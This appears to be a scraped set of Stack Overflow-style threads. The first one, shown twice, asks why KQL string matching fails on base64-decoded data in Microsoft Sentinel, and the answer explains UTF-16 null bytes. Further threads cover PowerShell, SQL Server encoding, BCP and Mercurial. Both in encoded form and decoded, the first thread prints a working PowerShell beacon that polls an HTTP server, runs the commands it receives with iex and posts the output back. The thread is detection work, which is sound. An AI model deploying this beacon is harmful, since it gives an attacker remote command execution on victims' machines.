KQL string function not parsing all characters - kql

I'm having difficulty searching a field for a value in KQL.
The field I am searching I get by decoding a base64 encoded string using the built in function base64_decode_tostring(). The string I am decoding is:
JABzAD0AJwAxADcAMgAuADIAMAAuADEAMAAuADIAOgA4ADAAOAAwACcAOwAkAGkAPQAnADYAOAAwADcAOQBhADAAYgAtADMANgA5ADAAMwAyADEAZAAtADEANgA2ADgAZABjADYAMQAnADsAJABwAD0AJwBoAHQAdABwADoALwAvACcAOwAkAHYAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACAALQBVAHIAaQAgACQAcAAkAHMALwA2ADgAMAA3ADkAYQAwAGIAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBYAC0AOQAyAGQAOQAtAGEAYgA2ADEAIgA9ACQAaQB9ADsAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMwA2ADkAMAAzADIAMQBkACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAGIANgAxACIAPQAkAGkAfQApAC4AQwBvAG4AdABlAG4AdAA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkAYQBiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByAGkAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABwACQAcwAvADEANgA2ADgAZABjADYAMQAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAGIANgAxACIAPQAkAGkAfQAgAC0AQgBvAGQAeQAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAZQArACQAcgApACAALQBqAG8AaQBuACAAJwAgACcAKQB9ACAAcwBsAGUAZQBwACAAMAAuADgAfQA=
This String decodes to what I expect in the decodedString Column:
$s='172.20.10.2:8080';$i='68079a0b-3690321d-1668dc61';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/68079a0b -Headers #{"X-92d9-ab61"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/3690321d -Headers #{"X-92d9-ab61"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/1668dc61 -Method POST -Headers #{"X-92d9-ab61"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}
It can be seen here in the results table:
When I try and use a | where decodedString contains "X-92d9-ab61" clause to detect the string value in the decodedString, Sentinel says there are no results. However I can clearly see this string in my decodedString column above.
In fact, the where clause won't detect anything, unless it is a single character included in the decodedString column.
Why will it only detect single characters? Why will it not detect more than a one character string?

ADX (Azure Data Explorer) aka Kusto, is the service used as a database for Azure Sentinel.
As the ADX documentation states "Internally, strings are encoded in UTF-8".
According to the phenomena you described, and the string you supplied ("AGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAG") it seems that your original data is of a different encoding, most likely UTF-16BE, therefore after ingestion you see your text as characters separated by the null character.
Something like this:
The recommended solution would be to convert your data to UTF-8 before ingesting it to Azure Sentinel.
Update
If the string is constructed only from ASCII characters, we can get a valid, searchable UTF-8 string by removing the NULL characters.
let str = "JABzAD0AJwAxADcAMgAuADIAMAAuADEAMAAuADIAOgA4ADAAOAAwACcAOwAkAGkAPQAnADYAOAAwADcAOQBhADAAYgAtADMANgA5ADAAMwAyADEAZAAtADEANgA2ADgAZABjADYAMQAnADsAJABwAD0AJwBoAHQAdABwADoALwAvACcAOwAkAHYAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACAALQBVAHIAaQAgACQAcAAkAHMALwA2ADgAMAA3ADkAYQAwAGIAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBYAC0AOQAyAGQAOQAtAGEAYgA2ADEAIgA9ACQAaQB9ADsAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMwA2ADkAMAAzADIAMQBkACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAGIANgAxACIAPQAkAGkAfQApAC4AQwBvAG4AdABlAG4AdAA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkAYQBiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByAGkAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABwACQAcwAvADEANgA2ADgAZABjADYAMQAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAGIANgAxACIAPQAkAGkAfQAgAC0AQgBvAGQAeQAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAZQArACQAcgApACAALQBqAG8AaQBuACAAJwAgACcAKQB9ACAAcwBsAGUAZQBwACAAMAAuADgAfQA=";
print translate("\0", "", base64_decode_tostring(str))
print_0
$s='172.20.10.2:8080';$i='68079a0b-3690321d-1668dc61';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/68079a0b -Headers #{"X-92d9-ab61"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/3690321d -Headers #{"X-92d9-ab61"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/1668dc61 -Method POST -Headers #{"X-92d9-ab61"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}
Fiddle

Related

MS Sentinel KQL - Unable to perform string match on decoded base 64 data [duplicate]

I'm having difficulty searching a field for a value in KQL.
The field I am searching I get by decoding a base64 encoded string using the built in function base64_decode_tostring(). The string I am decoding is:
JABzAD0AJwAxADcAMgAuADIAMAAuADEAMAAuADIAOgA4ADAAOAAwACcAOwAkAGkAPQAnADYAOAAwADcAOQBhADAAYgAtADMANgA5ADAAMwAyADEAZAAtADEANgA2ADgAZABjADYAMQAnADsAJABwAD0AJwBoAHQAdABwADoALwAvACcAOwAkAHYAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACAALQBVAHIAaQAgACQAcAAkAHMALwA2ADgAMAA3ADkAYQAwAGIAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBYAC0AOQAyAGQAOQAtAGEAYgA2ADEAIgA9ACQAaQB9ADsAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMwA2ADkAMAAzADIAMQBkACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAGIANgAxACIAPQAkAGkAfQApAC4AQwBvAG4AdABlAG4AdAA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkAYQBiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByAGkAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABwACQAcwAvADEANgA2ADgAZABjADYAMQAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAGIANgAxACIAPQAkAGkAfQAgAC0AQgBvAGQAeQAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAZQArACQAcgApACAALQBqAG8AaQBuACAAJwAgACcAKQB9ACAAcwBsAGUAZQBwACAAMAAuADgAfQA=
This String decodes to what I expect in the decodedString Column:
$s='172.20.10.2:8080';$i='68079a0b-3690321d-1668dc61';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/68079a0b -Headers #{"X-92d9-ab61"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/3690321d -Headers #{"X-92d9-ab61"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/1668dc61 -Method POST -Headers #{"X-92d9-ab61"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}
It can be seen here in the results table:
When I try and use a | where decodedString contains "X-92d9-ab61" clause to detect the string value in the decodedString, Sentinel says there are no results. However I can clearly see this string in my decodedString column above.
In fact, the where clause won't detect anything, unless it is a single character included in the decodedString column.
Why will it only detect single characters? Why will it not detect more than a one character string?
ADX (Azure Data Explorer) aka Kusto, is the service used as a database for Azure Sentinel.
As the ADX documentation states "Internally, strings are encoded in UTF-8".
According to the phenomena you described, and the string you supplied ("AGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAG") it seems that your original data is of a different encoding, most likely UTF-16BE, therefore after ingestion you see your text as characters separated by the null character.
Something like this:
The recommended solution would be to convert your data to UTF-8 before ingesting it to Azure Sentinel.
Update
If the string is constructed only from ASCII characters, we can get a valid, searchable UTF-8 string by removing the NULL characters.
let str = "JABzAD0AJwAxADcAMgAuADIAMAAuADEAMAAuADIAOgA4ADAAOAAwACcAOwAkAGkAPQAnADYAOAAwADcAOQBhADAAYgAtADMANgA5ADAAMwAyADEAZAAtADEANgA2ADgAZABjADYAMQAnADsAJABwAD0AJwBoAHQAdABwADoALwAvACcAOwAkAHYAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACAALQBVAHIAaQAgACQAcAAkAHMALwA2ADgAMAA3ADkAYQAwAGIAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBYAC0AOQAyAGQAOQAtAGEAYgA2ADEAIgA9ACQAaQB9ADsAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMwA2ADkAMAAzADIAMQBkACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAGIANgAxACIAPQAkAGkAfQApAC4AQwBvAG4AdABlAG4AdAA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkAYQBiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByAGkAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABwACQAcwAvADEANgA2ADgAZABjADYAMQAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAGIANgAxACIAPQAkAGkAfQAgAC0AQgBvAGQAeQAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAZQArACQAcgApACAALQBqAG8AaQBuACAAJwAgACcAKQB9ACAAcwBsAGUAZQBwACAAMAAuADgAfQA=";
print translate("\0", "", base64_decode_tostring(str))
print_0
$s='172.20.10.2:8080';$i='68079a0b-3690321d-1668dc61';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/68079a0b -Headers #{"X-92d9-ab61"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/3690321d -Headers #{"X-92d9-ab61"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/1668dc61 -Method POST -Headers #{"X-92d9-ab61"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}
Fiddle

Japanese Characters are not recognized when using Invoke-SqlCmd -Query

I'm inserting data from a json file to an SQL server table using Invoke-SqlCmd and using a stored procedure as following:
Invoke-SqlCmd -ServerInstance $servername -Database $database -Query "EXEC dbo.InsertDataFromJson #JSON='$json'
The json is obtained by getting it's raw content:
$json = Get-Content -Path "path\to.json" -Raw
$json # Content:
'{"Id": "2fe2353a-ddd7-479a-aa1a-9c2860680477",
"RecordType": 20,
"CreationTime": "2021-02-14T08:32:23Z",
"Operation": "ViewDashboard",
"UserKey": "10099",
"Workload": "PowerBI",
"UserId": "102273335#gmail.com",
"ItemName": "テスト",
"WorkSpaceName": "My Workspace",
"DashboardName": "テスト",
"ObjectId": "テスト" }'
All the column with strings, emails and japanese characters are NVARCHAR(MAX).
The problem is my json contains Japanese characters and they appear as ???? in the table.
When I try to insert a sample using SSMS directly it works fine.
Do you have any idea how to fix this ?
Thank you
Try setting the -Encoding flag to Utf8.
{"test":"みんな"}
Get-Content -Path ".\test.json" -Encoding Utf8
I just found an elegant solution to this mess, if you ever encounter the same problem.
First, I have a stored procedure that takes a parameter. The website that helped is: https://community.idera.com/database-tools/powershell/ask_the_experts/f/sql_server__sharepoint-9/18939/examples-running-sql-stored-procedures-from-powershell-with-output-parameters
Instead of using Invoke-SqlCmd (which is the worst), I used System.Data.SqlClient.SqlCommand as follow:
$connection.ConnectionString="Server={0};Database={1};Integrated Security=True" -f $servername, $database
$connection.Open()
Here I use Integrated Security so I don't need to enter my creds. "dbo.InsertDataFromJson" is my stored procedure.
$Command = new-Object System.Data.SqlClient.SqlCommand("dbo.InsertDataFromJson", $connection)
$json = Get-Content -Path .\sample.json -Raw
$Command.Parameters.Add("#JSON", [System.Data.SqlDbType]"NVARCHAR")
$Command.Parameters["#JSON"].Value = $json
$Command.ExecuteScalar()
$connection.Close()
And Voilà! My japanese characters are there, everything is fine and I'm very happy :)

Unable to export Rest API output to CSV via Azure Powershell RunBook

I am trying to export VMs list from Azure Update management using Azure Rest API. Below is my code.
$url = "https://management.azure.com/subscriptions/$($SubscriptionId)/resourceGroups/$($resourceGroup)/providers/Microsoft.Automation/automationAccounts/$($automationAccount)/softwareUpdateConfigurations/$($UpdateScheduleName)?api-version=" + $apiversion
$RestMethod = (Invoke-RestMethod -Uri $url -Headers $headerParams -Method Get)
$NonAzComputerList = ($RestMethod).Properties.updateConfiguration.nonAzureComputerNames
$NonAzComputerList.GetType().FullName
Write-Output $NonAzComputerList
$NonAzComputerList | Export-Csv "VMList.csv" -NoTypeInformation
On Console, I do get the output correctly with VM names, but in CSV file, I get some random numbers instead of VM names.
I tried convertfrom-json as well but it shows error as "convertfrom-json : Invalid JSON primitive".
The GetType shows System.Object[]
In Console, I am getting correct VM names.
OurVM01
OurVM022
OurVM0113
OurVM034
In CSV file, I am getting numbers (equal to number of characters in VM names).
List
07
08
09
08
Ok figured it out. Used out-file instead of export-csv

BCP update database table base on output from powershell

I have 4 files with the same csv header as following
Column1,Column2,Column3,Column4
But I only required data from Column2,Column3,Column4 for import the data into SQL database using BCP . I am using the PowerShell to select the columns that I want and import the required data using BCP but my powershell executed with no error and there are not data updated in my database table. May I know how to set the BCP to import the output from Powershell to database table. Here are my powershell script
$filePath = Get-ChildItem -Path 'D:\test\*' -Include $filename
$desiredColumn = 'Column2','Column3','Column4'
foreach($file in $filePath)
{
write-host $file
$test = import-csv $file | select $desiredColumn
write-host $test
$action = bcp <myDatabaseTableName> in $test -T -c -t";" -r"\n" -F2 -S <MyDatabase>
}
These are the output from the powershell script
D:\test\sample1.csv
#{column2=111;column3=222;column4=333} #{column2=444;column3=555;column4=666}
D:\test\sample2.csv
#{column2=777;column3=888;column4=999} #{column2=aaa;column3=bbb;column4=ccc}
First off, you can't update a table with bcp. It is used to bulk load data. That is, it will either insert new rows or export existing data into a flat file. Changing existing rows, usually called as updating, is out of scope for bcp. If that's what you need, you need to use another a tool. Sqlcmd works fine, and Powershell's got Invoke-Sqlcmd for running arbitary TSQL statements.
Anyway, the BCP utility has notoriously tricky syntax. As far as I know, one cannot bulk load data by passing the data as parameter to bcp, a source file must be used. Thus you need to save the filtered file and pass its name to bcp.
Exporting a filtered CSV is easy enough, just remember to use -NoTypeInformation switch, lest you'll get #TYPE Selected.System.Management.Automation.PSCustomObject as your first row of data. Assuming the bcp arguments are well and good (why -F2 though? And Unix newlines?).
Stripping double quotes requires another an edit to the file. Scrpting Guy has a solution.
foreach($file in $filePath){
write-host $file
$test = import-csv $file | select $desiredColumn
# Overwrite filtereddata.csv, should one exist, with filtered data
$test | export-csv -path .\filtereddata.csv -NoTypeInformation
# Remove doulbe quotes
(gc filtereddata.csv) | % {$_ -replace '"', ''} | out-file filtereddata.csv -Fo -En ascii
$action = bcp <myDatabaseTableName> in filtereddata.csv -T -c -t";" -r"\n" -F2 -S <MyDatabase>
}
Depending on your locale, column separator might be semicolon, colon or something else. Use -Delimiter '<character>' switch to pass whatever you need or change bcp's argument.
Erland's got a helpful page about bulk operations. Also, see Redgate's advice.
Without need to modify the file first, there is an answer here about how bcp can handle quoted data.
BCP in with quoted fields in source file
Essentially, you need to use the -f option and create/use a format file to tell SQL your custom field delimiter (in short, it is no longer a lone comma (,) but it is now (",")... comma with two double quotes. Need to escape the dblquotes and a small trick to handle the first doulbe quote on a line. But it works like a charm.
Also, need the format file to ignore column(s)... just set the destination column number to zero. All with no need to modify the file before load. Good luck!

Files with .sql extension identified as binary in Mercurial [duplicate]

This question already has answers here:
Closed 10 years ago.
Possible Duplicate:
Why does Mercurial think my SQL files are binary?
I generated a complete set of scripts for the stored procedures in a database. When I created a Mercurial repository and added these files they were all added as binary. Obviously, I still get the benefits of versioning, but lose a lot of efficiency, 'diff'ing, etc... of text files. I verified that these files are indeed all just text.
Why is it doing this?
What can I do to avoid it?
IS there a way to get Hg to change it mind about these files?
Here is a snippet of changeset log:
496.1 Binary file SQL/SfiData/Stored Procedures/dbo.pFindCustomerByMatchCode.StoredProcedure.sql has changed
497.1 Binary file SQL/SfiData/Stored Procedures/dbo.pFindUnreconcilableChecks.StoredProcedure.sql has changed
498.1 Binary file SQL/SfiData/Stored Procedures/dbo.pFixBadLabelSelected.StoredProcedure.sql has changed
499.1 Binary file SQL/SfiData/Stored Procedures/dbo.pFixCCOPL.StoredProcedure.sql has changed
500.1 Binary file SQL/SfiData/Stored Procedures/dbo.pFixCCOrderMoneyError.StoredProcedure.sql has changed
Thanks in advance for your help
Jim
In fitting with Mercurial's views on binary files, it does not actually track file types, which means that there is no way for a user to mark a file as binary or not binary.
As tonfa and Rudi mentioned, Mercurial determines whether a file is binary or not by seeing if there is a NUL byte anywhere in the file. In the case of UTF-[16|32] files, a NUL byte is pretty much guaranteed.
To "fix" this, you would have to ensure that the files are encoded with UTF-8 instead of UTF-16. Ideally, your database would have a setting for Unicode encoding when doing the export. If that's not the case, another option would be to write a precommit hook to do it (see How to convert a file to UTF-8 in Python for a start), but you would have to be very careful about which files you were converting.
I know it's a bit late, but I was evaluating Kiln and came across this problem. After discussion with the guys at Fogbugz who couldn't give me an answer other than "File/Save As" from SSMS for every *.sql file (very tedious), I decided to have a look at writing a quick script to convert the *.sql files.
Fortunately you can use one Microsoft technology (Powershell) to (sort of) overcome an issue with another Microsoft technology (SSMS) - using Powershell, change to the directory that contains your *.sql files and then copy and paste the following into the Powershell shell (or save as a .ps1 script and run it from Powershell - make sure to run the command "Set-ExecutionPolicy RemoteSigned" before trying to run a .ps1 script):
function Get-FileEncoding
{
[CmdletBinding()] Param (
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [string]$Path
)
[byte[]]$byte = get-content -Encoding byte -ReadCount 4 -TotalCount 4 -Path $Path
if ( $byte[0] -eq 0xef -and $byte[1] -eq 0xbb -and $byte[2] -eq 0xbf )
{ Write-Output 'UTF8' }
elseif ($byte[0] -eq 0xfe -and $byte[1] -eq 0xff)
{ Write-Output 'Unicode' }
elseif ($byte[0] -eq 0xff -and $byte[1] -eq 0xfe)
{ Write-Output 'Unicode' }
elseif ($byte[0] -eq 0 -and $byte[1] -eq 0 -and $byte[2] -eq 0xfe -and $byte[3] -eq 0xff)
{ Write-Output 'UTF32' }
elseif ($byte[0] -eq 0x2b -and $byte[1] -eq 0x2f -and $byte[2] -eq 0x76)
{ Write-Output 'UTF7'}
else
{ Write-Output 'ASCII' }
}
$files = get-ChildItem "*.sql"
foreach ( $file in $files )
{
$encoding = Get-FileEncoding $file
If ($encoding -eq 'Unicode')
{
(Get-Content "$file" -Encoding Unicode) | Set-Content -Encoding UTF8 "$file"
}
}
The function Get-FileEncoding is courtesy of http://poshcode.org/3227 although I had to modify it slightly to cater for UC2 little endian files which SSMS seems to have saved these as. I would recommend backing up your files first as it overwrites the original - you could, of course, modify the script so that it saves a UTF-8 version of the file instead e.g. change the last line of code to say:
(Get-Content "$file" -Encoding Unicode) | Set-Content -Encoding UTF8 "$file.new"
The script should be easy to modify to traverse subdirectories as well.
Now you just need to remember to run this if there are any new *.sql files, before you commit and push your changes. Any files already converted and subsequently opened in SSMS will stay as UTF-8 when saved.